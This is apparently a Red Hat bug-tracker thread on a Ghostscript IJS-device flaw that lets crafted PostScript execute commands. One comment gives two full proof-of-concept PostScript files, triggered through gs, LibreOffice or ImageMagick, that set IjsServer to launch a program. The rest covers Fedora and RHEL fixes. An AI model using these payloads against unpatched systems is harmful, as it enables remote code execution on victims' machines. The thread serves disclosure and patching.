In Artifex Ghostscript through 10.01.2, gdevijs.c in GhostPDL can lead to remote code execution via crafted PostScript documents because they can switch to the IJS device, or change the IjsServer parameter, after SAFER has been activated. References: https://bugs.ghostscript.com/show_bug.cgi?id=707051 https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=e59216049cac290fb437a04c4f41ea46826cfba5 https://ghostscript.com/
Created ghostscript tracking bugs for this issue: Affects: fedora-all [bug 2241112]
So, what's the current status regarding this vulnerability? This is highly critical: At the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use postscript files. In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example): 1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice): ------------------ %!PS-Adobe-3.0 EPSF-3.0 %%Document-Fonts: Times-Roman %%Title: print_version.eps %%Creator: PS_Write.F %%CreationDate: 02-Aug-99 %%Pages: 1 %%BoundingBox: 36 36 576 756 %%LanguageLevel: 1 %%EndComments %%BeginProlog %%EndProlog << /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice ------------------ 2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`: ------------------ %!PS-Adobe-3.0 EPSF-3.0 %%Document-Fonts: Times-Roman %%Title: print_version.eps %%Creator: PS_Write.F %%CreationDate: 02-Aug-99 %%Pages: 1 %%BoundingBox: 36 36 576 756 %%LanguageLevel: 1 %%EndComments %%BeginProlog %%EndProlog % this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer): { (ijs) finddevice setdevice } stopped {} {} ifelse pop % set ijserver to payload { mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice } stopped {} {} ifelse pop ------------------ What's the plan here? :)
Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896 Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411
(In reply to Alexander Neumann from comment #4) > Just to be clear: opening a LibreOffice document is enough to trigger the > RCE: we've made a video here: > https://twitter.com/RedTeamPT/status/1712379361146318896 > > Here's a video which shows the exploit for convert: > https://twitter.com/RedTeamPT/status/1712379364136964411 Hey Alexander, thanks for flagging that this had been missed. Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes. I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408).
Cool, thanks for the feedback! We really appreciate your work!
This issue has been addressed in the following products: Red Hat Enterprise Linux 9.0 Extended Update Support Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732